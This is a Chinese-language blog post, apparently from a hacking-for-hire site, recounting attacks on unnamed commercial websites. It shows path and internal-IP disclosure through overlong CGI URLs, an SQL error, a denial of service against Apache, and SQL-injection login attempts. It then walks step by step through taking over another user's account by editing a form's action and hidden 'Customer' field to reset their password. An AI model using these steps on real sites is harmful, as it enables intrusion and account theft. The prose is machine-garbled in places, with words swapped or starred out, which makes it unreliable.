商业网站已经没有什么系统软件难题了

hacker5年前 (2020-06-06)关于黑客接单971

原本对系统组件间隙,已经没有什么喜好了. 由于如今补丁下载出得迅速.商业网站已经没有什么系统软件难题了. 即使你应用twwwscan,namp等杀伤力很强的扫描枪也不太可能扫描仪出什么东西,有,也是行骗的.但,说白了百密必有一疏.越大的网址要求的脚本 *** 也越大.而脚本 *** 是靠工作能力写出去的.工作能力不好,其安全性必然存在的问题.倘若应用完全免费的脚本 *** ， *** 黑客接单网接单子新项目有那些难题也是多多的. 倘若原代码非常容易获得.侵入起來太简易了.

　　强烈要求：不必应用完全免费的脚本 *** 程序流程.用了还要注意调整安全性上的难题.

　　WEB脚本 *** 大概分成html,asp,cgi,php,jsp,xml,pl...这些.在其中cgi的难题多见,它是较为初期的脚本 *** 程序流程.因此对它的讨论也就相对性较多.html则是最安全性的.因为它作用至少,脚本 *** 也相对性少.

近期对一些商业网站（由于一些缘故，省去网站域名）测试了一下.也发觉了好多个脚本 *** 上的难题(已经调整)
http://bbs.xxxxxx.com/cgi-bin/user_interface?Pgroup_id=10322
将其调整
http://bbs.xxxxxx.com/cgi-bin/user_interface?Pgroup_id=***
可能曝露绝对路径(将会以便便捷调节用,很多网站都是有这难题)
Fail To Load HTML Template File: Fail To Open Template File:/usr/local/oiweb/htdocs
/club/community/***.htm
它是网络黑客接单网
接下去由二十四小时接单子的 *** 黑客实际操作
http://bbs.xxxxxx.com/cgi-bin/us ... ///////////////////
///////
长文件夹名称试一下^_^,哈...曝露內部IP了.
Fail To Load HTML Template File: Fail To Open Template File:/usr/local/oiweb/htdocs/club/community//////////////////////////////////////////
//////////192.168.10.30.htm
再说
http://bbs.xxxxxx.com/cgi-bin/user_interface?Pgroup_id='ls'
展现了SQL错误处理.可是,没去测试怎运用.
最终
http://bbs.xxxxxxx.com/cgi-bin/u ... ///////////////////
/////////////////////////////////////////////////////////////////////////////
较长文件夹名称进攻(apache对长文件夹名称url非常容易出难题)
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, webmaster@tencent.com and inform them of the time the error　occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log.
--------------------------------------------------------------------------------
Apache/1.3.12 Server at bbs.xxxxxx.com Port 80
,拒绝服务攻击了.估算只是xxx.xxx.xx.xx出难题,
拒绝服务攻击后,上边 *** 测试都已经无效.其他服务项目一切正常.
(那时候还觉得立刻打过补丁下载呢^_^)
这间隙没有什么主要用途,只是了解即便大中型得网址也是有BUG,呵呵呵^_^
之后又对此外一家商业网站开展了测试

http://training.yyyyyy.com/
测试了好多个验证间隙.包括那1' or passwd 〈〉 '1
都没取得成功:)之后申请注册了一个redh,登录进来:)
看来看去都没有什么...
然后选了调整[调整私人信息]
进来一看,就发现问题了:)
里边居然可以立即调整数字密码,而且也有user cookie
OK,即然发觉了,自然是实际操作了:)
打开原代码-〉搜索一下-〉post
〈form method="post" name=form1 id=form1 action="Myschool/StudentUpdate1.asp"〉
寻找这行,对action调整一下
〈form method="post" name=form1 id=form1 action="http://training.yyyyyy.com/Myschool/StudentUpdate1.asp";〉
随后再找username
〈tr〉〈td width="16%" class=bt align=right〉* 登录名：〈/td〉
〈td width="32%" class=nr align=left〉redh〈/td〉//登录名:)
改为sp.(你可以改的登录名)
随后储存成a.htm
运作后,把数字密码设成123(看着你钟爱了)
post以往...恩,跳到首页了..没取得成功..
随后我又看过一下原代码..
看过这一:
〈input type=hidden name=Customer value="redh"〉
:)原先cookie跑这了..
OK,调整一下..
〈input type=hidden name=Customer value="sp"〉
再post,哈...成功了..
登录sp,123^_^进去.看一下材料调整.跟调整时写的一样.
---------------------------------------------

　　想说一下,一个商业网站只须要应用很多脚本 *** 程序流程.必然存有XX难题的.这难题也许由于粗心大意,或许由于创作功底欠缺造成的.只需你耐心的找.便会发觉.自然对语言必然还要掌握的.你不太可能说对CGI一点都不容易,但去发觉它的难题吧.